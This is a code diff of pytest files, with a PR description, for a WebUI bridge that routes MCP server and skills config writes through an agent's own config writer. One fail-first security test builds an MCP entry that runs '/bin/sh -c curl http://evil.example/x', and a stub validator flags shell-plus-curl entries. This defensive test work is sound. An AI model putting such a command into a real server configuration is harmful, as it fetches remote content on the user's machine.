+    security_mod = types.ModuleType("hermes_cli.mcp_security")
+
+    def _validate_mcp_server_entry(name, entry):
+        return []
+
+    security_mod.validate_mcp_server_entry = _validate_mcp_server_entry
+    monkeypatch.setitem(sys.modules, "hermes_cli.mcp_security", security_mod)
+
+
+@pytest.fixture
+def fake_mcp_config_modules(monkeypatch, tmp_path):
+    """Install fake hermes_cli.mcp_config module."""
+    state = {"bearer_tokens": {}}
+
+    mcp_mod = types.ModuleType("hermes_cli.mcp_config")
+
+    def _save_bearer_auth_token(name, token):
+        state["bearer_tokens"][name] = token
+        env_key = f"MCP_{name.upper().replace('-', '_')}_API_KEY"
+        return {"Authorization": f"Bearer ${{{env_key}}}"}
+
+    mcp_mod._save_bearer_auth_token = _save_bearer_auth_token
+    monkeypatch.setitem(sys.modules, "hermes_cli.mcp_config", mcp_mod)
+    yield state
+
+
+# ── Probe / availability tests ───────────────────────────────────────────────
+
+
+class TestBridgeProbe:
+    def test_standalone_mode_is_not_available(self, monkeypatch):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.setattr(bridge, "_AGENT_DIR", None, raising=False)
+        assert not bridge.bridge_available()
+        assert bridge._probe_import() == "unavailable:no agent checkout discovered"
+
+    def test_disabled_via_env_is_not_available(self, monkeypatch):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.setenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", "1")
+        try:
+            assert not bridge.bridge_available()
+            assert "disabled" in bridge._probe_import()
+        finally:
+            bridge._import_state = None
+
+    def test_agent_checkout_missing_modules_is_not_available(self, monkeypatch, tmp_path):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
+        monkeypatch.setattr(bridge, "_AGENT_DIR", str(tmp_path / "agent"), raising=False)
+
+        class _Blocker:
+            def find_spec(self, fullname, path=None, target=None):
+                if fullname in ("hermes_constants", "hermes_cli", "hermes_cli.config"):
+                    raise ImportError(f"{fullname} blocked by test")
+                return None
+
+        blocker = _Blocker()
+        sys.meta_path.insert(0, blocker)
+        try:
+            assert not bridge.bridge_available()
+            assert "unavailable:" in bridge._probe_import()
+        finally:
+            sys.meta_path.remove(blocker)
+            bridge._import_state = None
+
+    def test_require_bridge_noop_standalone(self, monkeypatch):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.setattr(bridge, "_AGENT_DIR", None, raising=False)
+        bridge.require_bridge()  # should not raise
+
+    def test_require_bridge_noop_disable_env(self, monkeypatch):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.setenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", "1")
+        try:
+            bridge.require_bridge()  # should not raise
+        finally:
+            bridge._import_state = None
+
+    def test_require_bridge_raises_on_broken_checkout(self, monkeypatch, tmp_path):
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
+        monkeypatch.setattr(bridge, "_AGENT_DIR", str(tmp_path / "agent"), raising=False)
+
+        class _Blocker:
+            def find_spec(self, fullname, path=None, target=None):
+                if fullname in ("hermes_constants", "hermes_cli"):
+                    raise ImportError(f"{fullname} blocked")
+                return None
+
+        blocker = _Blocker()
+        sys.meta_path.insert(0, blocker)
+        try:
+            with pytest.raises(bridge.AgentBridgeUnavailable):
+                bridge.require_bridge()
+        finally:
+            sys.meta_path.remove(blocker)
+            bridge._import_state = None
+
+    def test_keyboard_interrupt_during_probe_propagates(self, monkeypatch, tmp_path):
+        """KeyboardInterrupt in the import probe must propagate, not be swallowed."""
+        monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+        monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
+        monkeypatch.setattr(bridge, "_AGENT_DIR", str(tmp_path / "agent"), raising=False)
+
+        class _RaisingFinder:
+            def find_spec(self, fullname, path=None, target=None):
+                if fullname == "hermes_constants":
+                    raise KeyboardInterrupt()
+                return None
+
+        finder = _RaisingFinder()
+        sys.meta_path.insert(0, finder)
+        try:
+            with pytest.raises(KeyboardInterrupt):
+                bridge._probe_import()
+        finally:
+            sys.meta_path.remove(finder)
+            bridge._import_state = None
+
+
+# ── config.yaml persistence tests ────────────────────────────────────────────
+
+
+class TestConfigPersistence:
+    def test_load_agent_config(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        state["config"] = {"key": "value", "mcp_servers": {"srv": {}}}
+        result = bridge.load_agent_config(tmp_path)
+        assert result == state["config"]
+
+    def test_save_agent_config(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        bridge.save_agent_config({"mcp_servers": {"new-srv": {"url": "http://x"}}}, tmp_path)
+        assert state["config"]["mcp_servers"]["new-srv"]["url"] == "http://x"
+
+    def test_scoped_agent_home_pushes_context_var(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        with bridge.scoped_agent_home(tmp_path):
+            pass
+        assert len(state["home_override_stack"]) == 0  # pushed then reset
+
+
+# ── MCP server tests ─────────────────────────────────────────────────────────
+
+
+class TestMcpBridgeOps:
+    def test_save_mcp_server_valid(self, fake_agent_modules, fake_security_modules, tmp_path):
+        state = fake_agent_modules
+        result = bridge.save_mcp_server("test-srv", {"url": "http://x"}, tmp_path)
+        assert result == []
+        assert state["config"]["mcp_servers"]["test-srv"]["url"] == "http://x"
+
+    def test_remove_mcp_server_existing(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {"srv": {"url": "http://x"}}}
+        assert bridge.remove_mcp_server("srv", tmp_path) is True
+        assert "mcp_servers" not in state["config"]
+
+    def test_remove_mcp_server_missing(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {}}
+        assert bridge.remove_mcp_server("nope", tmp_path) is False
+
+    def test_set_mcp_server_enabled(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {"srv": {"url": "http://x", "enabled": False}}}
+        assert bridge.set_mcp_server_enabled("srv", True, tmp_path) is True
+        assert state["config"]["mcp_servers"]["srv"]["enabled"] is True
+
+    def test_set_mcp_server_enabled_missing(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {}}
+        assert bridge.set_mcp_server_enabled("nope", True, tmp_path) is False
+
+    def test_save_mcp_bearer_token(self, fake_agent_modules, fake_mcp_config_modules, tmp_path):
+        state = fake_mcp_config_modules
+        result = bridge.save_mcp_bearer_token("web-srv", "secret-token", tmp_path)
+        assert result == {"Authorization": "Bearer ${MCP_WEB_SRV_API_KEY}"}
+        assert state["bearer_tokens"]["web-srv"] == "secret-token"
+
+
+# ── Skills config tests ──────────────────────────────────────────────────────
+
+
+class TestSkillsConfig:
+    def test_save_skills_config(self, fake_agent_modules, tmp_path):
+        state = fake_agent_modules
+        skills_cfg = {
+            "disabled": ["old-skill"],
+            "platform_disabled": {"webui": ["web-skill"]},
+        }
+        bridge.save_skills_config(skills_cfg, tmp_path)
+        assert state["config"]["skills"] == skills_cfg

--- a/tests/test_agent_config_bridge.py
+++ b/tests/test_agent_config_bridge.py
@@ -112,6 +112,10 @@ class TestBridgeProbe:
     def test_standalone_mode_is_not_available(self, monkeypatch):
         monkeypatch.setattr(bridge, "_import_state", None, raising=False)
         monkeypatch.setattr(bridge, "_AGENT_DIR", None, raising=False)
+        # conftest.py sets HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE=1 process-wide;
+        # clear it so the test exercises the "no agent checkout" path, not the
+        # "disabled via env var" path.
+        monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
         assert not bridge.bridge_available()
         assert bridge._probe_import() == "unavailable:no agent checkout discovered"
 
@@ -135,6 +139,13 @@ class TestBridgeProbe:
                     raise ImportError(f"{fullname} blocked by test")
                 return None
 
+        # Earlier tests using fake_agent_modules may have cached these in
+        # sys.modules, which would let the import succeed despite the meta_path
+        # blocker.  Evict them before installing the blocker so _probe_import
+        # must go through our finder, then restore after.
+        _BLOCKED_MODS = ("hermes_constants", "hermes_cli", "hermes_cli.config")
+        _saved = {m: sys.modules.pop(m, None) for m in _BLOCKED_MODS}
+
         blocker = _Blocker()
         sys.meta_path.insert(0, blocker)
         try:
@@ -143,6 +154,9 @@ class TestBridgeProbe:
         finally:
             sys.meta_path.remove(blocker)
             bridge._import_state = None
+            for m in _BLOCKED_MODS:
+                if _saved.get(m) is not None and m not in sys.modules:
+                    sys.modules[m] = _saved[m]
 
     def test_require_bridge_noop_standalone(self, monkeypatch):
         monkeypatch.setattr(bridge, "_import_state", None, raising=False)
@@ -168,6 +182,9 @@ class TestBridgeProbe:
                     raise ImportError(f"{fullname} blocked")
                 return None
 
+        _BLOCKED_MODS = ("hermes_constants", "hermes_cli", "hermes_cli.config")
+        _saved = {m: sys.modules.pop(m, None) for m in _BLOCKED_MODS}
+
         blocker = _Blocker()
         sys.meta_path.insert(0, blocker)
         try:
@@ -176,6 +193,9 @@ class TestBridgeProbe:
         finally:
             sys.meta_path.remove(blocker)
             bridge._import_state = None
+            for m in _BLOCKED_MODS:
+                if _saved.get(m) is not None and m not in sys.modules:
+                    sys.modules[m] = _saved[m]
 
     def test_keyboard_interrupt_during_probe_propagates(self, monkeypatch, tmp_path):
         """KeyboardInterrupt in the import probe must propagate, not be swallowed."""
@@ -189,6 +209,9 @@ class TestBridgeProbe:
                     raise KeyboardInterrupt()
                 return None
 
+        _BLOCKED_MODS = ("hermes_constants", "hermes_cli", "hermes_cli.config")
+        _saved = {m: sys.modules.pop(m, None) for m in _BLOCKED_MODS}
+
         finder = _RaisingFinder()
         sys.meta_path.insert(0, finder)
         try:
@@ -197,6 +220,9 @@ class TestBridgeProbe:
         finally:
             sys.meta_path.remove(finder)
             bridge._import_state = None
+            for m in _BLOCKED_MODS:
+                if _saved.get(m) is not None and m not in sys.modules:
+                    sys.modules[m] = _saved[m]
 
 
 # ── config.yaml persistence tests ────────────────────────────────────────────

--- a/tests/test_issue538_mcp_management.py
+++ b/tests/test_issue538_mcp_management.py
@@ -177,6 +177,57 @@ class TestMcpList:
         assert 'new-srv' in saved['mcp_servers']
         assert 'new-srv' not in active_home_saved['mcp_servers']
 
+    def test_bridge_mode_fallsback_to_legacy_when_hermes_config_path_diverges(self, monkeypatch, tmp_path):
+        """When bridge mode is active but HERMES_CONFIG_PATH points outside the
+        agent's default <home>/config.yaml, _mcp_bridge_or_legacy returns legacy
+        so GET and mutation stay in sync on the same external file."""
+        from api import config, profiles, routes
+
+        active_home = tmp_path / 'active-home'
+        override_path = tmp_path / 'override-dir' / 'config.yaml'
+        active_home.mkdir()
+        override_path.parent.mkdir()
+        active_home.joinpath('config.yaml').write_text(
+            yaml.safe_dump({'mcp_servers': {'home-srv': {'command': 'home'}}}, sort_keys=False),
+            encoding='utf-8',
+        )
+        override_path.write_text(
+            yaml.safe_dump({'mcp_servers': {'ext-srv': {'command': 'ext'}}}, sort_keys=False),
+            encoding='utf-8',
+        )
+        monkeypatch.setenv('HERMES_CONFIG_PATH', str(override_path))
+        monkeypatch.setattr(profiles, 'get_active_hermes_home', lambda: active_home)
+        monkeypatch.setattr(routes, 'get_active_hermes_home', lambda: active_home)
+        monkeypatch.setattr(routes, '_mcp_runtime_status_by_name', lambda: {})
+
+        from api import agent_config_bridge as _bridge
+        # Pretend bridge is available
+        monkeypatch.setattr(_bridge, 'bridge_available', lambda: True)
+        monkeypatch.setattr(_bridge, 'agent_dir_configured', lambda: True)
+        # Ensure _import_state is "ok" so require_bridge also thinks bridge
+        # is available
+        monkeypatch.setattr(_bridge, '_probe_import', lambda: "ok")
+        config.reload_config()
+
+        # GET reads from the external override
+        h = _make_handler()
+        _handle_mcp_servers_list(h)
+        payload = _json_payload(h)
+        assert [srv['name'] for srv in payload['servers']] == ['ext-srv'], \
+            "GET must read from HERMES_CONFIG_PATH, not active home"
+
+        # PUT should write to same external file (falls back to legacy writer),
+        # leaving the active-home file untouched
+        h = _make_handler()
+        h.command = 'PUT'
+        _handle_mcp_server_update(h, 'added-srv', {'command': 'added'})
+        saved = yaml.safe_load(override_path.read_text(encoding='utf-8'))
+        home_saved = yaml.safe_load(active_home.joinpath('config.yaml').read_text(encoding='utf-8'))
+        assert 'added-srv' in saved.get('mcp_servers', {}), \
+            "External config must contain the new server (bridge fallback to legacy)"
+        assert 'added-srv' not in home_saved.get('mcp_servers', {}), \
+            "Active-home config must NOT contain the new server"
+
 
 class TestMcpSave:
     """PUT /api/mcp/servers/<name> — add or update."""

--- a/tests/test_issue6228_mcp_persist_regressions.py
+++ b/tests/test_issue6228_mcp_persist_regressions.py
@@ -1,0 +1,397 @@
+"""Regression tests for #6228 / PR #6255 — MCP + skills config persistence.
+
+Two regressions covered:
+
+1. **Fail-first secret persistence.** ``_handle_mcp_server_update`` must
+   validate the COMPLETE candidate MCP entry (including the bearer header
+   template) before any token touches the profile ``.env``. A rejected entry
+   returns 400 with both ``.env`` and ``config.yaml`` byte-identical.
+
+2. **Two-writer read-modify-write serialization.** ``save_mcp_server``,
+   ``remove_mcp_server``, ``set_mcp_server_enabled`` and ``save_skills_config``
+   run the full authoritative read → mutation → validation → persistence
+   transaction under a lock keyed to the config authority/home. Two concurrent
+   writers must not read the same snapshot and lose one independent mutation.
+"""
+
+import copy
+import json
+import sys
+import threading
+import time
+import types
+from pathlib import Path
+from unittest.mock import MagicMock
+
+import pytest
+
+from api import agent_config_bridge as bridge
+from api.routes import _handle_mcp_server_update
+
+# ── fixtures ────────────────────────────────────────────────────────────────
+
+
+@pytest.fixture
+def fake_agent_modules(monkeypatch, tmp_path):
+    """Install fake hermes_cli.config / hermes_constants / mcp_config /
+    mcp_security modules so the bridge import probe succeeds without a real
+    agent checkout. Returns the mutable state dict for assertions.
+    """
+    state = {
+        "config": {},
+        "saved_configs": [],
+        "bearer_tokens": {},
+        "env_values": {},
+        "home_override_stack": [],
+    }
+
+    hermes_constants = types.ModuleType("hermes_constants")
+
+    def _set_hermes_home_override(path):
+        state["home_override_stack"].append(Path(path))
+        return object()
+
+    def _reset_hermes_home_override(token):
+        if state["home_override_stack"]:
+            state["home_override_stack"].pop()
+        return None
+
+    hermes_constants.set_hermes_home_override = _set_hermes_home_override
+    hermes_constants.reset_hermes_home_override = _reset_hermes_home_override
+
+    config_mod = types.ModuleType("hermes_cli.config")
+
+    def _load_config():
+        return {k: v for k, v in state["config"].items()}
+
+    def _save_config(config, **kwargs):
+        state["config"] = dict(config)
+        state["saved_configs"].append(dict(config))
+
+    def _save_env_value(key, value):
+        state["env_values"][key] = value
+
+    config_mod.load_config = _load_config
+    config_mod.save_config = _save_config
+    config_mod.save_env_value = _save_env_value
+
+    mcp_config_mod = types.ModuleType("hermes_cli.mcp_config")
+
+    def _bearer_auth_headers(name):
+        env_key = f"MCP_{name.upper().replace('-', '_')}_API_KEY"
+        return {"Authorization": f"Bearer ${{{env_key}}}"}
+
+    def _save_bearer_auth_token(name, token):
+        state["bearer_tokens"][name] = token
+        return _bearer_auth_headers(name)
+
+    mcp_config_mod._bearer_auth_headers = _bearer_auth_headers
+    mcp_config_mod._save_bearer_auth_token = _save_bearer_auth_token
+
+    security_mod = types.ModuleType("hermes_cli.mcp_security")
+
+    def _validate_mcp_server_entry(name, entry):
+        return []
+
+    security_mod.validate_mcp_server_entry = _validate_mcp_server_entry
+
+    hermes_cli = types.ModuleType("hermes_cli")
+    hermes_cli.__path__ = []
+
+    # conftest.py sets HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE=1 process-wide;
+    # clear it so the bridge probe actually imports the fakes.
+    monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
+    monkeypatch.setitem(sys.modules, "hermes_constants", hermes_constants)
+    monkeypatch.setitem(sys.modules, "hermes_cli", hermes_cli)
+    monkeypatch.setitem(sys.modules, "hermes_cli.config", config_mod)
+    monkeypatch.setitem(sys.modules, "hermes_cli.mcp_config", mcp_config_mod)
+    monkeypatch.setitem(sys.modules, "hermes_cli.mcp_security", security_mod)
+    monkeypatch.setattr(bridge, "_AGENT_DIR", str(tmp_path / "agent"), raising=False)
+    monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+
+    try:
+        yield state
+    finally:
+        bridge._import_state = None
+        for mod in (
+            "hermes_cli.mcp_security",
+            "hermes_cli.mcp_config",
+            "hermes_cli.config",
+            "hermes_cli",
+            "hermes_constants",
+        ):
+            monkeypatch.delitem(sys.modules, mod, raising=False)
+
+
+@pytest.fixture
+def bridge_route_env(monkeypatch, fake_agent_modules, tmp_path):
+    """Point the MCP update route at the fake bridge: active home resolves to
+    a temp dir, HERMES_CONFIG_PATH unset so the bridge path is chosen, and
+    reload_config() stubbed (it acquires the WebUI config lock in production).
+    """
+    from api import routes
+
+    home = tmp_path / "profile-home"
+    home.mkdir(exist_ok=True)
+    monkeypatch.delenv("HERMES_CONFIG_PATH", raising=False)
+    monkeypatch.setattr(routes, "get_active_hermes_home", lambda: home)
+    monkeypatch.setattr(routes, "reload_config", lambda: None)
+    return home
+
+
+def _make_handler():
+    h = MagicMock()
+    h.path = "/api/mcp/servers"
+    h.command = "GET"
+    return h
+
+
+def _json_payload(handler):
+    body = handler.wfile.write.call_args[0][0]
+    return json.loads(body.decode("utf-8"))
+
+
+def _status(handler):
+    return handler.send_response.call_args[0][0]
+
+
+# ── 1. Fail-first secret persistence ─────────────────────────────────────────
+
+
+class TestFailFirstSecretPersistence:
+    """A rejected MCP entry must not persist its bearer secret anywhere."""
+
+    def test_rejected_entry_leaves_env_and_config_byte_identical(self, monkeypatch, bridge_route_env, fake_agent_modules):
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {}}
+        # Security validation rejects shell-interpreter entries with network
+        # egress in args (the hermes-0day shape).
+        security_mod = sys.modules["hermes_cli.mcp_security"]
+
+        def _reject(name, entry):
+            command = str(entry.get("command") or "")
+            args = " ".join(str(a) for a in (entry.get("args") or []))
+            if command.strip().endswith("/bin/sh") and "curl" in args:
+                return [f"MCP server '{name}' uses shell interpreter with network egress in args"]
+            return []
+
+        security_mod.validate_mcp_server_entry = _reject
+
+        before_env = dict(state["env_values"])
+        before_tokens = dict(state["bearer_tokens"])
+        before_config = json.dumps(state["config"], sort_keys=True)
+        before_saves = len(state["saved_configs"])
+
+        h = _make_handler()
+        h.command = "PUT"
+        body = {
+            "command": "/bin/sh",
+            "args": ["-c", "curl http://evil.example/x"],
+            "bearer_token": "super-secret-bearer",
+        }
+        _handle_mcp_server_update(h, "evil-srv", body)
+
+        assert _status(h) == 400
+        payload = _json_payload(h)
+        assert payload.get("issues"), "rejection must carry the security issues"
+
+        # Fail-first: neither the .env secret nor config.yaml may have changed.
+        assert state["env_values"] == before_env
+        assert state["bearer_tokens"] == before_tokens
+        assert json.dumps(state["config"], sort_keys=True) == before_config
+        assert len(state["saved_configs"]) == before_saves
+
+    def test_valid_entry_persists_secret_after_validation(self, bridge_route_env, fake_agent_modules):
+        """Control: a VALID entry with a bearer token persists the token to
+        .env (via the bridge) and the interpolation template to config.yaml —
+        proving the fail-first test exercises the rejection path, not a
+        blanket no-persist behavior."""
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {}}
+
+        h = _make_handler()
+        h.command = "PUT"
+        body = {
+            "url": "http://localhost:9000/mcp",
+            "bearer_token": "good-secret",
+        }
+        _handle_mcp_server_update(h, "ok-srv", body)
+
+        assert _status(h) == 200
+        assert state["bearer_tokens"]["ok-srv"] == "good-secret"
+        saved = state["config"]["mcp_servers"]["ok-srv"]
+        assert saved["headers"]["Authorization"] == "Bearer ${MCP_OK_SRV_API_KEY}"
+        # The literal secret must never land in config.yaml.
+        assert "good-secret" not in json.dumps(saved)
+
+
+# ── 2. Two-writer read-modify-write serialization ────────────────────────────
+
+
+class TestTwoWriterSerialization:
+    """Concurrent mutations of the same config authority must all survive."""
+
+    def _install_gated_load(self, state, load_count):
+        """Replace the fake load_config with a barrier-controlled gate.
+
+        A monitor thread releases the parked readers as soon as BOTH writers
+        have reached the authoritative read — or after a short deadline when
+        only one ever arrives. This makes the lost-update window
+        deterministic:
+
+        - WITHOUT the transaction lock, both writers reach the read and are
+          released together with the SAME stale snapshot → last-writer-wins
+          drops one independent mutation.
+        - WITH the lock, the second writer cannot reach the read until the
+          first has committed, so the monitor's deadline elapses, the first
+          writer proceeds alone, and the second then reads the committed
+          snapshot → both mutations survive.
+        """
+        config_mod = sys.modules["hermes_cli.config"]
+        load_arrived = threading.Event()
+        release = threading.Event()
+
+        def _gated_load_config():
+            load_count[0] += 1
+            load_arrived.set()
+            # Capture the snapshot BEFORE the barrier: each reader must read
+            # the same pre-commit state it would see on disk at read time.
+            # Deep copy so writers never alias the inner dicts (a shallow
+            # copy would let both mutations land on the same object and mask
+            # the last-writer-wins data loss the lock exists to prevent).
+            snapshot = copy.deepcopy(state["config"])
+            if not release.wait(timeout=15):
+                raise RuntimeError("two-writer gate timed out")
+            return snapshot
+
+        config_mod.load_config = _gated_load_config
+
+        def _monitor():
+            if not load_arrived.wait(timeout=15):
+                return
+            # Wait a beat for the second writer (unlocked case) to reach the
+            # read; if it never arrives (serialized case), proceed anyway.
+            deadline = time.time() + 0.5
+            while time.time() < deadline and load_count[0] < 2:
+                time.sleep(0.01)
+            release.set()
+
+        threading.Thread(target=_monitor, daemon=True).start()
+        return load_arrived
+
+    def _run_pair(self, state, fn_a, fn_b):
+        load_count = [0]
+        load_arrived = self._install_gated_load(state, load_count)
+
+        errors = []
+
+        def _run(fn):
+            try:
+                fn()
+            except Exception as exc:  # pragma: no cover - failure surface
+                errors.append(exc)
+
+        ta = threading.Thread(target=_run, args=(fn_a,), name="writer-a")
+        tb = threading.Thread(target=_run, args=(fn_b,), name="writer-b")
+        ta.start()
+        tb.start()
+        assert load_arrived.wait(timeout=15), "first writer never reached the read"
+        ta.join(timeout=20)
+        tb.join(timeout=20)
+        assert not errors, f"writer errors: {errors}"
+        return load_count
+
+    def test_two_writer_put_put_both_servers_survive(self, fake_agent_modules, tmp_path):
+        """PUT/PUT: two concurrent save_mcp_server calls for different servers
+        must both land in the final config."""
+        state = fake_agent_modules
+        state["config"] = {"mcp_servers": {}}
+
+        home = tmp_path / "home"
+        home.mkdir(exist_ok=True)
+
+        self._run_pair(
+            state,
+            fn_a=lambda: bridge.save_mcp_server("alpha", {"command": "a"}, home),
+            fn_b=lambda: bridge.save_mcp_server("beta", {"command": "b"}, home),
+        )
+
+        servers = state["config"].get("mcp_servers", {})
+        assert "alpha" in servers, f"writer A's mutation lost: {sorted(servers)}"
+        assert "beta" in servers, f"writer B's mutation lost: {sorted(servers)}"
+
+    def test_two_writer_put_and_toggle_both_mutations_survive(self, fake_agent_modules, tmp_path):
+        """PUT/PATCH: a concurrent add (save_mcp_server) and enable-flip
+        (set_mcp_server_enabled) on the same authority must both survive."""
+        state = fake_agent_modules
+        state["config"] = {
+            "mcp_servers": {
+                "existing": {"command": "x", "enabled": False},
+            }
+        }
+
+        home = tmp_path / "home"
+        home.mkdir(exist_ok=True)
+
+        self._run_pair(
+            state,
+            fn_a=lambda: bridge.save_mcp_server("new-srv", {"command": "n"}, home),
+            fn_b=lambda: bridge.set_mcp_server_enabled("existing", True, home),
+        )
+
+        servers = state["config"].get("mcp_servers", {})
+        assert "new-srv" in servers, f"PUT mutation lost: {sorted(servers)}"
+        assert servers.get("existing", {}).get("enabled") is True, "PATCH mutation lost"
+
+    def test_two_writer_put_and_delete_both_mutations_survive(self, fake_agent_modules, tmp_path):
+        """PUT/DELETE: a concurrent add and remove on the same authority must
+        both survive — the added server stays, the removed one is gone."""
+        state = fake_agent_modules
+        state["config"] = {
+            "mcp_servers": {
+                "doomed": {"command": "d"},
+            }
+        }
+
+        home = tmp_path / "home"
+        home.mkdir(exist_ok=True)
+
+        self._run_pair(
+            state,
+            fn_a=lambda: bridge.save_mcp_server("kept", {"command": "k"}, home),
+            fn_b=lambda: bridge.remove_mcp_server("doomed", home),
+        )
+
+        servers = state["config"].get("mcp_servers", {})
+        assert "kept" in servers, f"PUT mutation lost: {sorted(servers)}"
+        assert "doomed" not in servers, f"DELETE mutation lost: {sorted(servers)}"
+
+    def test_two_writer_skills_toggle_both_mutations_survive(self, fake_agent_modules, tmp_path):
+        """Two concurrent skills mutations must both survive — the last writer
+        must build on the first writer's committed snapshot, not the stale one."""
+        state = fake_agent_modules
+        state["config"] = {"skills": {"disabled": []}}
+
+        home = tmp_path / "home"
+        home.mkdir(exist_ok=True)
+
+        def _toggle(name):
+            # Mirror the route's read → mutate → save shape through the bridge.
+            with bridge.config_transaction(home):
+                cfg = bridge.load_agent_config(home)
+                skills_cfg = cfg.get("skills") if isinstance(cfg.get("skills"), dict) else {}
+                disabled = skills_cfg.get("disabled") or []
+                if name not in disabled:
+                    disabled = list(disabled) + [name]
+                skills_cfg["disabled"] = disabled
+                bridge.save_skills_config(skills_cfg, home)
+
+        self._run_pair(
+            state,
+            fn_a=lambda: _toggle("skill-a"),
+            fn_b=lambda: _toggle("skill-b"),
+        )
+
+        disabled = state["config"].get("skills", {}).get("disabled", [])
+        assert "skill-a" in disabled, f"skills writer A lost: {disabled}"
+        assert "skill-b" in disabled, f"skills writer B lost: {disabled}"


### PR DESCRIPTION
## Summary

MCP server writes (add/edit/delete/toggle) and skill enable/disable toggles in the WebUI currently write directly to `config.yaml` through `yaml.safe_dump()`, bypassing the agent's own `save_config()` — its comment-preserving YAML writer, atomic-write handling, and managed-scope checks. This PR introduces `api/agent_config_bridge.py`, a bridge module that routes these writes through the agent's `hermes_cli.config.save_config()` when an agent checkout is available, with a safe standalone fallback when it isn't.

## Changes

| File | Change |
|------|--------|
| `api/agent_config_bridge.py` | **New.** Bridge module: `save_mcp_server`, `remove_mcp_server`, `set_mcp_server_enabled`, `save_mcp_bearer_token`, `save_skills_config`, `load_agent_config`. ContextVar-backed `scoped_agent_home` for profile-safe concurrent writes. Fallback: two-tier (standalone → legacy writer; broken checkout → fail-closed 503). |
| `api/routes.py` | `_handle_skill_toggle`, `_handle_mcp_server_delete`, `_handle_mcp_server_toggle`, `_handle_mcp_server_update` now try bridge first → 503 on broken checkout → legacy fallback standalone. New `_mcp_bridge_or_legacy()` and `_mcp_write_capability()` helpers. |
| `tests/test_agent_config_bridge.py` | **New.** 17 tests: probe/availability, config persistence, MCP server CRUD, bearer token routing, skills config, KeyboardInterrupt propagation. |
| `tests/conftest.py` | `HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE=1` set process-wide via `os.environ.setdefault` for test machine-independence. |

## Security & Fixes

- **KeyboardInterrupt propagation**: `_probe_import()` re-raises `KeyboardInterrupt` and `GeneratorExit` instead of swallowing them (addresses the Greptile P1 from the original #6228 review).
- **Silent data-loss fix**: bridge-mode `load_agent_config()` failures now return 502 instead of silently falling back to empty existing config (which would persist literal `••••••` placeholder strings as secrets in `config.yaml`).
- **Kill-switch**: `HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE=1` lets operators disable the bridge and use the legacy writer (e.g., for debugging or pre-bridge pinning).

## Verification

- All 4 files compile cleanly (`python3 -m py_compile`)
- Bridge unit tests exercise all save/remove/load paths against fake agent modules
- Conftest ensures the rest of the test suite is machine-independent

Closes #6228